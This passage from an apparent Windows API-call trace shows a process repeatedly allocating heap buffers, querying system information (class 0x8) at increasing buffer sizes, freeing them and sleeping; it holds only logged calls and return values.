ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0298.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0298.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0298.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0298.468] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0298.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0298.469] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.469] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0298.469] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.470] Sleep (dwMilliseconds=0x110) [0298.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0298.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0298.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0298.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0298.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0298.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0298.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0298.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0298.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.490] Sleep (dwMilliseconds=0x110) [0298.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0298.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0298.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0298.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0298.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0298.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0298.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0298.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0298.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.501] Sleep (dwMilliseconds=0x110) [0298.567] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0298.567] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.568] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0298.568] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0298.568] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.569] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0298.569] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0298.569] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.570] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0298.570] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0298.570] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.570] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0298.573] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.574] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.574] Sleep (dwMilliseconds=0x110) [0298.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0298.599] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0298.604] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0298.604] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.604] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0298.604] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0298.604] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.605] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0298.605] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0298.605] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.606] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0298.606] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.606] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.607] Sleep (dwMilliseconds=0x110) [0298.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0298.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0298.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0298.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0298.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0298.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0298.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0298.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0298.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.630] Sleep (dwMilliseconds=0x110) [0298.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0298.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0298.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0298.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0298.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0298.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0298.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0298.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0298.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.646] Sleep (dwMilliseconds=0x110) [0298.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0298.671] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0298.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0298.672] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0298.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0298.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0298.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0298.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0298.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.674] Sleep (dwMilliseconds=0x110) [0298.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0298.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0298.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0298.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0298.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0298.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0298.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0298.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0298.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.691] Sleep (dwMilliseconds=0x110) [0298.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0298.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0298.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0298.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0298.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0298.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0298.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0298.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0298.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.703] Sleep (dwMilliseconds=0x110) [0298.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0298.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0298.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0298.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0298.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0298.720] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0298.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0298.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0298.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.722] Sleep (dwMilliseconds=0x110) [0298.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0298.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0298.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0298.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0298.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0298.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0298.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0298.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.743] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0298.744] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.744] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.744] Sleep (dwMilliseconds=0x110) [0298.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0298.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0298.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0298.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0298.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0298.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0298.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0298.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0298.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.754] Sleep (dwMilliseconds=0x110) [0298.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0298.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0298.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0298.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0298.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0298.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0298.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0298.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0298.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0298.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0298.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0298.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0298.769] Sleep (dwMilliseconds=0x110) [0298.783] 